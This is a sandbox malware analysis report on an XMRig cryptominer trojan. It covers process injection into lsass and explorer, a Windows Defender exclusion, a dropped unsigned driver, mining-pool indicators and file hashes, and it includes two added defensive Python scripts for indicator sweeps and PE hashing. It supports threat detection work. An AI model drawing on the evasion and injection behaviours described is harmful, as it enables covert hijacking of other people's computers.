          Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | Hidden Files and Directories (1) | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
          Behavior Graph ID: 1587400 | Sample: nW2oopMIdg.exe | Startdate: 10/01/2025 | Architecture: WINDOWS | Score: 100

          DNS/IP contacted by the sample: pool.supportxmr.com, pool-fr.supportxmr.com
          Sample-level signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; 10 other signatures
          Processes started at the root of the graph: nW2oopMIdg.exe, Lightshot.exe

          nW2oopMIdg.exe: dropped C:\ProgramData\Screenshots\Lightshot.exe (PE32+); signatures: Uses powercfg.exe to modify the power settings; Modifies the context of a thread in another process (thread injection); Adds a directory exclusion to Windows Defender; started dialer.exe, powershell.exe, cmd.exe and 13 other processes
          Lightshot.exe: dropped C:\Windows\Temp\yycjbdwxjaoe.sys (PE32+); signatures: Multi AV Scanner detection for dropped file; Sample is not signed and drops a device driver; Modifies power options to not sleep / hibernate; started dialer.exe (two instances), powershell.exe and 11 other processes
          dialer.exe (started by nW2oopMIdg.exe): Contains functionality to inject code into remote processes; Writes to foreign memory regions; Allocates memory in foreign processes; Contains functionality to compare user and computer (likely to detect sandboxes); injected into lsass.exe, winlogon.exe and 2 other processes
          powershell.exe (started by nW2oopMIdg.exe): Loading BitLocker PowerShell Module; started conhost.exe
          cmd.exe (started by nW2oopMIdg.exe): started 2 other processes
          dialer.exe (first instance started by Lightshot.exe): Injects code into the Windows Explorer (explorer.exe); Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes; started 4 other processes
          dialer.exe (second instance started by Lightshot.exe): network: 141.94.96.71, 49704, 80, DFNVereinzurFoerderungeinesDeutschenForschungsnetzese, Germany; Query firmware table information (likely to detect VMs); Found strings related to Crypto-Mining; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          powershell.exe (started by Lightshot.exe): started conhost.exe
          lsass.exe (injected by dialer.exe): Installs new ROOT certificates; Writes to foreign memory regions
          conhost.exe (started by the powershell.exe child of nW2oopMIdg.exe): Adds a directory exclusion to Windows Defender; Modifies power options to not sleep / hibernate

          Antivirus, machine learning and genetic malware detection (submitted file):

          Source | Detection | Scanner | Label | Link
          nW2oopMIdg.exe | 62% | Virustotal | | Browse
          nW2oopMIdg.exe | 66% | ReversingLabs | Win64.Trojan.MintZard |

          Dropped files:

          Source | Detection | Scanner | Label | Link
          C:\ProgramData\Screenshots\Lightshot.exe | 66% | ReversingLabs | Win64.Trojan.MintZard |
          C:\Windows\Temp\yycjbdwxjaoe.sys | 5% | ReversingLabs | |

          Unpacked PE files: No Antivirus matches
          Domains: No Antivirus matches

          URLs:

          Source | Detection | Scanner | Label | Link
          http://3csp.icrosof4m/ocp0 | 0% | Avira URL Cloud | safe |
          https://172.94.1q | 0% | Avira URL Cloud | safe |
          Contacted domains:

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          pool-fr.supportxmr.com | 141.94.96.144 | true | false | | unknown
          pool.supportxmr.com | unknown | unknown | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 00000027.00000000.2076104919.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283163976.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 00000027.00000000.2076104919.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3283163976.00000140AD850000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 00000027.00000000.2076039842.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://3csp.icrosof4m/ocp0 | lsass.exe, 00000027.00000000.2076735630.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000027.00000002.3286173867.00000140AE074000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 00000027.00000002.3282908894.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://172.94.1q | dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://xmrig.com/docs/algorithms | dialer.exe, 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
141.94.96.71 | unknown | Germany | | 680 | DFN Verein zur Foerderung eines Deutschen Forschungsnetzes e | true
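The network tables above give the indicators a responder would carry out of this report: the two supportxmr.com pool domains, the pool IPs 141.94.96.71 and 141.94.96.144, the dropped driver path, and the sample hashes, plus the observation that the injected dialer.exe speaks the Stratum mining protocol. The following is an added example, not part of the Joe Sandbox report: it sweeps constructed endpoint telemetry for those indicators and flags the newline-delimited JSON-RPC "login" that XMRig sends to a Stratum pool. The log line format, host names and the wallet string are assumptions made for the example; the indicator values themselves are copied from the report.

```python
"""Sweep constructed telemetry for the indicators listed in this report (added example)."""
import json
import re

# Indicators copied from the report's network and dropped-file tables.
IOC_DOMAINS = {"pool-fr.supportxmr.com", "pool.supportxmr.com"}
IOC_IPS = {"141.94.96.71", "141.94.96.144"}
IOC_PATHS = {
    r"c:\programdata\screenshots\lightshot.exe",
    r"c:\windows\temp\yycjbdwxjaoe.sys",
}
IOC_SHA256 = {
    "35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c",  # nW2oopMIdg.exe / Lightshot.exe
    "11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5",  # yycjbdwxjaoe.sys
}

# Constructed sample telemetry (assumed format): "<timestamp> <host> <channel> key=value ...".
# ws42 is benign noise: login.live.com is one of the domains the sandbox whitelisted.
SAMPLE_LOG = """\
2025-01-10T09:36:20Z ws17 dns query=pool-fr.supportxmr.com answer=141.94.96.144
2025-01-10T09:36:21Z ws17 net dst=141.94.96.144:443 proto=tcp proc=dialer.exe
2025-01-10T09:36:22Z ws17 file path=C:\\Windows\\Temp\\yycjbdwxjaoe.sys sha256=11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
2025-01-10T09:36:30Z ws42 dns query=login.live.com answer=40.126.32.133
2025-01-10T09:36:31Z ws42 file path=C:\\Users\\alice\\Documents\\notes.txt sha256=AAAA
"""

# Constructed Stratum login as XMRig sends it (wallet address is a placeholder, not from the report).
SAMPLE_PAYLOAD = ('{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4placeholder-wallet",'
                  '"pass":"x","agent":"XMRig/6.x","algo":["rx/0"]}}')

KV_RE = re.compile(r"(\w+)=(\S+)")  # values cannot contain spaces in the assumed log format


def parse_line(line):
    """Split one telemetry line into its fixed fields plus the key=value pairs that follow."""
    parts = line.split(" ", 3)
    if len(parts) < 4:
        return None
    ts, host, channel, rest = parts
    return {"ts": ts, "host": host, "channel": channel, **dict(KV_RE.findall(rest))}


def sweep(log_text):
    """Return (host, reason) for every line that touches a report indicator."""
    hits = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        reason = None
        if ev["channel"] == "dns":
            if ev.get("query", "").lower() in IOC_DOMAINS:
                reason = "dns:" + ev["query"]
            elif ev.get("answer") in IOC_IPS:
                reason = "dns-answer:" + ev["answer"]
        elif ev["channel"] == "net":
            ip = ev.get("dst", "").rsplit(":", 1)[0]  # strip the port
            if ip in IOC_IPS:
                reason = "net:" + ip
        elif ev["channel"] == "file":
            if ev.get("path", "").lower() in IOC_PATHS:
                reason = "path:" + ev["path"]
            elif ev.get("sha256", "").lower() in IOC_SHA256:
                reason = "sha256:" + ev["sha256"].lower()
        if reason:
            hits.append((ev["host"], reason))
    return hits


def is_stratum_login(payload):
    """True for a JSON-RPC 'login' carrying the agent/algo fields an XMRig client advertises to its pool."""
    try:
        msg = json.loads(payload)
    except ValueError:
        return False
    if not isinstance(msg, dict) or msg.get("method") != "login":
        return False
    params = msg.get("params")
    return isinstance(params, dict) and ("agent" in params or "algo" in params)


if __name__ == "__main__":
    for host, reason in sweep(SAMPLE_LOG):
        print(f"{host}: {reason}")
    print("stratum login:", is_stratum_login(SAMPLE_PAYLOAD))
```

The sweep matches on exact indicators only, so a rebuilt miner with a new pool host or a re-packed binary would pass it; the Stratum check is the more durable of the two because the login exchange is what any XMRig build must send before it can mine, regardless of where it connects.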
                                  Joe Sandbox version:42.0.0 Malachite
                                  Analysis ID:1587400
                                  Start date and time:2025-01-10 10:35:05 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 9m 48s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:62
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:8
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:nW2oopMIdg.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c.exe
                                  Detection:MAL
                                  Classification:mal100.spyw.evad.mine.winEXE@90/12@1/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                  • Excluded IPs from analysis (whitelisted): 40.126.32.133, 40.126.32.134, 40.126.32.76, 20.190.160.17, 40.126.32.136, 20.190.160.20, 40.126.32.140, 20.190.160.22, 20.109.210.53, 13.107.253.45
                                  • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, dns.msftncsi.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Not all processes were analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:35:53 | API Interceptor | 1x Sleep call for process: nW2oopMIdg.exe modified
04:35:54 | API Interceptor | 32x Sleep call for process: powershell.exe modified
04:36:31 | API Interceptor | 429883x Sleep call for process: winlogon.exe modified
04:36:32 | API Interceptor | 346307x Sleep call for process: lsass.exe modified
04:36:32 | API Interceptor | 1107x Sleep call for process: svchost.exe modified
04:36:34 | API Interceptor | 409567x Sleep call for process: dwm.exe modified
04:36:36 | API Interceptor | 1884x Sleep call for process: dialer.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
141.94.96.71 | SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | malicious | Xmrig |
 | xmr_linux_amd64 (2).elf | malicious | Xmrig |
 | SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe | malicious | Xmrig |
 | kWYLtJ0Cn1.exe | malicious | LoaderBot, Xmrig |
 | h2UFp4aCRq.exe | malicious | LoaderBot, Xmrig |
 | http://pool.supportxmr.com | malicious | Unknown |
 | http://pool.supportxmr.com | malicious | Unknown |
 | 01904399.dat.exe | malicious | LoaderBot, Xmrig |
 | file.exe | malicious | Xmrig |
 | file.exe | malicious | Xmrig |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pool-fr.supportxmr.com | chrtrome22.exe | malicious | Xmrig | 141.94.96.144
 | 174.exe | malicious | Xmrig | 141.94.96.144
 | file.exe | malicious | Xmrig | 141.94.96.144
 | SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe | malicious | Xmrig | 141.94.96.71
 | file.exe | malicious | Xmrig | 141.94.96.71
 | egFMhHSlmf.exe | malicious | Xmrig | 141.94.96.71
 | xmr_linux_amd64 (2).elf | malicious | Xmrig | 141.94.96.195
 | xmr_linux_amd64.elf | malicious | Xmrig | 141.94.96.195
 | SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exe | malicious | Xmrig | 141.94.96.144
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DFN Verein zur Foerderung eines Deutschen Forschungsnetzes e | armv4l.elf | malicious | Unknown | 195.37.28.224
 | armv6l.elf | malicious | Unknown | 134.245.99.176
 | armv7l.elf | malicious | Unknown | 139.19.193.179
 | https://www.bing.com/ck/a?!&&p=3c39a9f42e445bf68e8df296bb1fae53d0c972b7afa34ab05d6ca3737dc8872cJmltdHM9MTczNjM4MDgwMA&ptn=3&ver=2&hsh=4&fclid=2ffa23fd-270b-62aa-06ef-300e230b6c77&u=a1aHR0cHM6Ly93d3cuYmluZy5jb20vYWxpbmsvbGluaz91cmw9aHR0cHMlM2ElMmYlMmZ3d3cuYWxwaGFzdXJhbmNlLmNvbSUyZiZzb3VyY2U9c2VycC1sb2NhbCZoPUE1Z0FJY1RpY2tXbGRHJTJidFFwJTJmY0dnQ3Z3Tmg4UmZjRXBwQmdUTGlNOEtNJTNkJnA9bHdfdHAmaWc9QTlFRTIyOTNCQzJGNDgyMDlGMTkyNEFBOUQ4MTUyNkYmeXBpZD1ZTjg3M3gxNzg2NjcxMDE2NTE1NDQyOTA3NA&ntb=1 | malicious | Unknown | 141.95.100.236
 | https://t.co/qNQo33w8wD | malicious | HTMLPhisher | 141.95.98.65
 | chrtrome22.exe | malicious | Xmrig | 141.94.96.144
 | http://hockey30.com | malicious | Unknown | 141.95.171.140
 | https://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/ | malicious | Unknown | 141.95.171.140
 | n397UdH3b5.exe | malicious | Wannacry, Conti | 131.188.40.189
                                                      No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Windows\Temp\yycjbdwxjaoe.sys | chrtrome22.exe | malicious | Xmrig |
 | pTVKHqys2h.exe | malicious | Xmrig |
 | 174.exe | malicious | Xmrig |
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, XWorm, Xmrig |
 | 47SXvEQ.exe | malicious | Blank Grabber, Xmrig |
 | xmr new.exe | malicious | Xmrig |
 | eth.exe | malicious | Xmrig |
 | file.exe | malicious | Xmrig |
 | hiwA7Blv7C.exe | malicious | Xmrig |
                                                                        Process:C:\Users\user\Desktop\nW2oopMIdg.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):2876416
                                                                        Entropy (8bit):6.537334125155787
                                                                        Encrypted:false
                                                                        SSDEEP:49152:lYul8CapE2jLY0vFhbkQbIptv1xZ4ayOIYDIGC3FYKjPgz+WWrS2sWioLyVQGMNx:lYLCGYYbkQbytvVeOIerC1zPgSWW/pio
                                                                        MD5:990A3F3B1273510F210FB9B541DA219F
                                                                        SHA1:33E536C5B4BDB6F6042F93445DFFD8A3AD488E8B
                                                                        SHA-256:35A8D03F86AE6F92424D6424FE0805D338ECCEDFF177B400182102685299022C
                                                                        SHA-512:495734313CAE980D3F48EF78422CF9484EB347833672FD5C693F8F8C92C1C0D51986795CD55A3148BE18FF0C9D36ADFF5A1C3FF18200668DD33F3978A459C246
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........N+.....@..........@.............................p,...........`.................................................x...<....P,.P.... ,..............`,.x...............................(.......8...............X............................text...f........................... ..`.rdata... ......."..................@..@.data....1+...... +.................@....pdata....... ,.......+.............@..@.00cfg.......0,.......+.............@..@.tls.........@,.......+.............@....rsrc...P....P,.......+.............@..@.reloc..x....`,.......+.............@..B........................................................................................................................................................................................................................................................................................................
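The per-file fields above (File Type, Size, Entropy (8bit), MD5/SHA1/SHA-256) are what the sandbox recomputes for every dropped artifact, and the PE subsystem value is what separates this "PE32+ executable (GUI) x86-64" copy of the sample from the "PE32+ executable (native) x86-64" driver yycjbdwxjaoe.sys listed later in this section. The following is an added example, not part of the Joe Sandbox report: it recomputes those fields from raw bytes so that a file recovered from a host can be compared with the report. The real samples are not embedded; the helper builds a minimal, constructed PE32+ header with a chosen subsystem, and the description strings it returns imitate the report's wording rather than any library's output.

```python
"""Recompute the dropped-file fields (type, size, entropy, hashes) from raw bytes (added example)."""
import hashlib
import math
import struct
from collections import Counter

IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32PLUS_MAGIC = 0x20B
SUBSYSTEMS = {1: "native", 2: "GUI", 3: "console"}  # IMAGE_SUBSYSTEM_* values that matter here


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for constant or empty input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_pe(data: bytes) -> str:
    """Describe a PE image in the report's wording, or report that the headers do not parse."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return "not a PE image"
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]             # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0" or len(data) < pe_off + 24 + 70:
        return "not a PE image"
    machine, = struct.unpack_from("<H", data, pe_off + 4)        # COFF Machine
    opt = pe_off + 24                                            # optional header follows the 20-byte COFF header
    magic, = struct.unpack_from("<H", data, opt)                 # 0x10b = PE32, 0x20b = PE32+
    subsystem, = struct.unpack_from("<H", data, opt + 68)        # same offset in PE32 and PE32+
    fmt = "PE32+" if magic == PE32PLUS_MAGIC else "PE32"
    arch = "x86-64" if machine == IMAGE_FILE_MACHINE_AMD64 else f"machine 0x{machine:04x}"
    kind = SUBSYSTEMS.get(subsystem, f"subsystem {subsystem}")
    return f"{fmt} executable ({kind}) {arch}, for MS Windows"


def describe(data: bytes) -> dict:
    """The subset of the report's per-file fields that can be recomputed from the bytes alone."""
    return {
        "File Type": classify_pe(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": shannon_entropy(data),
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
    }


def build_pe32plus(subsystem: int) -> bytes:
    """Constructed minimal PE32+ image (DOS header, COFF header, optional header): enough to classify, not to run."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                      # PE signature directly after the DOS header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, 1, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)                                         # PE32+ optional header with 16 data directories
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + coff + bytes(opt)


if __name__ == "__main__":
    for name, image in (("gui", build_pe32plus(2)), ("driver", build_pe32plus(1))):
        print(name, describe(image))
```

Entropy alone does not separate the two real artifacts here (6.54 for the 2.8 MB executable, 6.27 for the 14 KB driver, neither in the packed or encrypted range), which is why the report's "Encrypted: false" holds for both; the subsystem field and the unsigned driver drop are the stronger signals.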
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1510207563435464
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                        MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                        SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                        SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                        SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                        Malicious:false
                                                                        Preview:@...e................................................@..........
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1510207563435464
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlllul2lllllZ:NllUClll
                                                                        MD5:4D98AF7F487E62A9C1D44B02674BAB7E
                                                                        SHA1:1B492B2208949EB7F18C32F309C296B4258DBA65
                                                                        SHA-256:1E3ED9CE6343DA27C6759A0F05D6DD0B92B3A9C63B6492A2DA4E4F371D9F56DA
                                                                        SHA-512:60EC859B84836E865E767FE858E70ACEC6F0FB8077B2E51D6CB4095533433B791C9A16396D69279C7F896DF003A1ED6656087B43EFA16523DA4026317CBB49E6
                                                                        Malicious:false
                                                                        Preview:@...e.................................:..............@..........
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
